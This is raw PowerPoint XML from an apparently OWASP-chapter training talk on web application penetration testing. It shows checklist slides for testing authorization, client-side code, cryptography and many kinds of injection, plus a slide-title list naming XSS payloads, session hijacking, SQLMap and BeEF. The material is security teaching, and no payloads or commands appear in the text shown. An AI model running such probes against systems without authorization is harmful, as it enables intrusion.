          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery - Authorization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98497455-5AB4-46BA-BF65-3EA7B2CD597F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for path traversal </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for bypassing authorization schema </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for vertical Access control problems  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for horizontal Access control problems  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for missing authorization </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22610658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AD8F6-A0F0-4551-AE5C-2C071D9F4D99}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery – Client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC59EEB0-73EC-40B9-8F2A-533A539DFA07}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1600201"/>
            <a:ext cx="11220450" cy="4525963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Rich Internet Applications – JS, HTML5, Java, Silverlight</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Analyze all traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Decompile or reverse engineer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check Local storage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check Interactions between server, API, database, or other applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for sensitive data in source code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="162918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AE257-2AB5-446D-BCEA-81769D820C97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery - Sensitive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29521FFA-5A44-44A4-ADA6-26C95EAC9A02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check if data which should be encrypted is not </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for wrong algorithms usage depending on context </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for weak algorithms usage </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for proper use of salting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for randomness functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check SSL Version </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check for Digital Certificate Validity  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check credentials only delivered over HTTPS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check session tokens only delivered over HTTPS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check if HTTP Strict Transport Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25480020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D0335-F054-4616-9387-C5F99860634D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discovery - Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C02F98D3-F29F-4734-8CAC-5AF01CA72D47}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="200025" y="1514475"/>
            <a:ext cx="11382375" cy="5172075"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for Reflected Cross Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for Stored Cross Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for DOM based Cross Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for Cross Site Flashing </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for HTML Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for SQL Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for LDAP Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for ORM Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for XML Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for XXE Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for SSI Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for XPath Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Test for XQuery Injection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{475DB93A-A121-43A3-B069-09CE8C5AA10D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5689600" y="1225689"/>
            <a:ext cx="7964486" cy="5170646"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for IMAP </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for Code Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for Command Injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for Overflow  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for Format String </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for incubated vulnerabilities </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for HTTP Splitting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for HTTP Verb Tampering </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for Open Redirection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for Local File Inclusion </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for Remote File Inclusion </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Compare client-side and server-side validation rules </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for NoSQL injection </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for HTTP parameter pollution </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0"/>
              <a:t>Test for auto-binding </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32328780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TYTAG" val="EmptyTag"/>
  <p:tag name="04/16/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag10.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="11/13/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/16/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag3.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/16/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag4.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/16/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag5.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/16/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag6.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="04/16/2010" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag7.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="11/13/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag8.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="11/13/2009" val="LastModified"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag9.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="11/13/2009" val="LastModifie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7603</TotalTime>
  <Words>4008</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>1010</Paragraphs>
  <Slides>158</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158</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="164" baseType="lpstr">
      <vt:lpstr>ＭＳ Ｐゴシック</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>BloomCON 2019</vt:lpstr>
      <vt:lpstr>WHOAMI – Nathan Cooper</vt:lpstr>
      <vt:lpstr>Today’s Goal / Agenda</vt:lpstr>
      <vt:lpstr>Open Web Application Security Project (OWASP)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>OWASP Top Ten (2017 Edition)</vt:lpstr>
      <vt:lpstr>4 Main Categories</vt:lpstr>
      <vt:lpstr>Attack Vectors</vt:lpstr>
      <vt:lpstr>Mapping from 2013 to 2017 Top 10</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Risk Rating Methodology</vt:lpstr>
      <vt:lpstr>XSS Overall 6.0 </vt:lpstr>
      <vt:lpstr>Top 10 Risk Factor Summary</vt:lpstr>
      <vt:lpstr>OWASP Projects – Flag ship</vt:lpstr>
      <vt:lpstr>OWAP – PA Chapter</vt:lpstr>
      <vt:lpstr>OWASP Membership</vt:lpstr>
      <vt:lpstr>Bug Bounty Programs</vt:lpstr>
      <vt:lpstr>Vulnerabilities By Industry</vt:lpstr>
      <vt:lpstr>Top Vulnerabilities</vt:lpstr>
      <vt:lpstr>Additional Standards</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PART II</vt:lpstr>
      <vt:lpstr>Developer?</vt:lpstr>
      <vt:lpstr>Getting Started</vt:lpstr>
      <vt:lpstr>Authorization</vt:lpstr>
      <vt:lpstr>Authorization</vt:lpstr>
      <vt:lpstr>Scope – Type of tests</vt:lpstr>
      <vt:lpstr>Scope</vt:lpstr>
      <vt:lpstr>Automated Scanners - DAST</vt:lpstr>
      <vt:lpstr>Static code analyzers - SAST</vt:lpstr>
      <vt:lpstr>Environment - Access</vt:lpstr>
      <vt:lpstr>Consider Security products</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Architecture</vt:lpstr>
      <vt:lpstr>Front End</vt:lpstr>
      <vt:lpstr>Back End Languages</vt:lpstr>
      <vt:lpstr>API</vt:lpstr>
      <vt:lpstr>Penetration Testing Methodologies</vt:lpstr>
      <vt:lpstr>Methodology - SANS</vt:lpstr>
      <vt:lpstr>Methodology - NIST 800-115</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Tool – Whois, Netcraft, Robtex</vt:lpstr>
      <vt:lpstr>Tool – Nslookup, Dig</vt:lpstr>
      <vt:lpstr>Tool – Recon-NG</vt:lpstr>
      <vt:lpstr>Methodology – Passive Recon</vt:lpstr>
      <vt:lpstr>Tool - Discover</vt:lpstr>
      <vt:lpstr>Tool - theHarvester</vt:lpstr>
      <vt:lpstr>Methodology – Passive Recon</vt:lpstr>
      <vt:lpstr>Tool - Exif</vt:lpstr>
      <vt:lpstr>Methodology – Passive Recon</vt:lpstr>
      <vt:lpstr>Methodology – Passive Recon</vt:lpstr>
      <vt:lpstr>Methodology – Passive Recon</vt:lpstr>
      <vt:lpstr>Methodology – Passive Recon</vt:lpstr>
      <vt:lpstr>Methodology – Passive Recon</vt:lpstr>
      <vt:lpstr>Maltego CE</vt:lpstr>
      <vt:lpstr>Methodology - Active</vt:lpstr>
      <vt:lpstr>Methodology - Active</vt:lpstr>
      <vt:lpstr>NMAP</vt:lpstr>
      <vt:lpstr>NMAP</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Nmap Output Example</vt:lpstr>
      <vt:lpstr>NMAP Scripts</vt:lpstr>
      <vt:lpstr>NMAP Help Scripts</vt:lpstr>
      <vt:lpstr>Script Categories</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>NMAP Commands</vt:lpstr>
      <vt:lpstr>Wappaylzer</vt:lpstr>
      <vt:lpstr>Nikto</vt:lpstr>
      <vt:lpstr>Weak Ciphers</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Browser</vt:lpstr>
      <vt:lpstr>Browser</vt:lpstr>
      <vt:lpstr>Browser</vt:lpstr>
      <vt:lpstr>Built in Developer Tools</vt:lpstr>
      <vt:lpstr>Interception Proxies</vt:lpstr>
      <vt:lpstr>BURP PRO</vt:lpstr>
      <vt:lpstr>Browser and Proxy</vt:lpstr>
      <vt:lpstr>Directory enumeration</vt:lpstr>
      <vt:lpstr>File Extensions</vt:lpstr>
      <vt:lpstr>Manual Mapping</vt:lpstr>
      <vt:lpstr>Manual Mapping</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Discovery - Content</vt:lpstr>
      <vt:lpstr>Discovery - Configuration</vt:lpstr>
      <vt:lpstr>Discovery - Authentication</vt:lpstr>
      <vt:lpstr>Discovery - Session Management</vt:lpstr>
      <vt:lpstr>Discovery - Authorization</vt:lpstr>
      <vt:lpstr>Discovery – Client side</vt:lpstr>
      <vt:lpstr>Discovery - Sensitive</vt:lpstr>
      <vt:lpstr>Discovery - Injection</vt:lpstr>
      <vt:lpstr>Discovery – Business Logic</vt:lpstr>
      <vt:lpstr>Discovery – Denial of Service</vt:lpstr>
      <vt:lpstr>OWASP testing Guide</vt:lpstr>
      <vt:lpstr>Cewl</vt:lpstr>
      <vt:lpstr>Methodology</vt:lpstr>
      <vt:lpstr>Payloads</vt:lpstr>
      <vt:lpstr>SQLMap</vt:lpstr>
      <vt:lpstr>BeEF</vt:lpstr>
      <vt:lpstr>Reports</vt:lpstr>
      <vt:lpstr>Additional Tools</vt:lpstr>
      <vt:lpstr>Additional tools</vt:lpstr>
      <vt:lpstr>Markdown Output</vt:lpstr>
      <vt:lpstr>Additional Tools</vt:lpstr>
      <vt:lpstr>Additional Tools</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Part III - XSS – Cross site Scripting</vt:lpstr>
      <vt:lpstr>XSS – What is xss</vt:lpstr>
      <vt:lpstr>Main Types</vt:lpstr>
      <vt:lpstr>XSS – Types – Reflective</vt:lpstr>
      <vt:lpstr>XSS – Types – Stored</vt:lpstr>
      <vt:lpstr>XSS – Types – DOM</vt:lpstr>
      <vt:lpstr>Other Types</vt:lpstr>
      <vt:lpstr>Blind XSS - Tools</vt:lpstr>
      <vt:lpstr>Disable XXS Protection</vt:lpstr>
      <vt:lpstr>Where do we find it?</vt:lpstr>
      <vt:lpstr>XSS – Discovery </vt:lpstr>
      <vt:lpstr>XSS – Discovery </vt:lpstr>
      <vt:lpstr>XSS – Discovery </vt:lpstr>
      <vt:lpstr>XSS – Reflective - Encoding </vt:lpstr>
      <vt:lpstr>Encoding using Chrome</vt:lpstr>
      <vt:lpstr>DEMO - GET</vt:lpstr>
      <vt:lpstr>DEMO - POST</vt:lpstr>
      <vt:lpstr>DEMO JSON XSS</vt:lpstr>
      <vt:lpstr>Challenge DVWA Reflected</vt:lpstr>
      <vt:lpstr>Challenge DVWA Reflected - MED</vt:lpstr>
      <vt:lpstr>Challenge Stored Low - Med</vt:lpstr>
      <vt:lpstr>Challenge Mutillidae Password Gen</vt:lpstr>
      <vt:lpstr>XSS - Payloads</vt:lpstr>
      <vt:lpstr>XSS - Payloads</vt:lpstr>
      <vt:lpstr>Payload</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>Demo - Session Hijacking -  Stored XSS</vt:lpstr>
      <vt:lpstr>XSS – Cross site Scripting</vt:lpstr>
      <vt:lpstr>XSS – Prevent</vt:lpstr>
      <vt:lpstr>XSS – Defenses</vt:lpstr>
      <vt:lpstr>Recommendations Bug Bounty </vt:lpstr>
      <vt:lpstr>Recommendations Bug Bounty </vt:lpstr>
      <vt:lpstr>Recommendations Bug Bounty </vt:lpstr>
      <vt:lpstr>Bug Bounty</vt:lpstr>
      <vt:lpstr>XSS – Practice</vt:lpstr>
      <vt:lpstr>Web Hacking – Training - Paid</vt:lpstr>
      <vt:lpstr>Web hacking – Training - FREE</vt:lpstr>
      <vt:lpstr>Books</vt:lpstr>
      <vt:lpstr>Slides</vt:lpstr>
      <vt:lpstr>Contact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PA OWASP Chapter</dc:title>
  <dc:creator>Nathan Cooper</dc:creator>
